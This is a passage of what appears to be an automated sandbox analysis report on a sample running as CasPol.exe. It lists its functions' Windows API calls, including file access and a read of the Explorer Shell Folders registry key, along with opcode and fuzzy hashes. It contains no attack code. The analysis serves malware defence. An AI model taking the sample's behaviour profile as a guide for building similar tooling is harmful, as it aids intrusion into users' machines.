                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                                                                  Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                                                                                                  • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                                  • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                                                                  Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                                                                                                                  • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                                  • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                                                                  Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                  • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                                  • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                                                                  Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                  • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                                  • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                                                                  Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                                                                                  • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                                  • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                                                                  Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                                                                  • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                                  • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                                                                  Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: EnumNamesResource
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3334572018-0
                                                                                                                                                                                                                                  • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                                  • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                                                                  Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Open
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                                                                                                                  • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                                  • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                                                                                  Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                  • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                                  • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                                                                  Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                    • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                                    • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                                                    • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3655998216-0
                                                                                                                                                                                                                                  • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                                                  • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                                                                  Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00445426
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1828521557-0
                                                                                                                                                                                                                                  • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                                                  • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                                                                  Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2136311172-0
                                                                                                                                                                                                                                  • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                                  • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                                                                  Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                  • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                                                                  • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                                                                  Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                  • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                                                                  • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                                                                                                  Function 00415304 Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                  • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                                                                                                                  • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E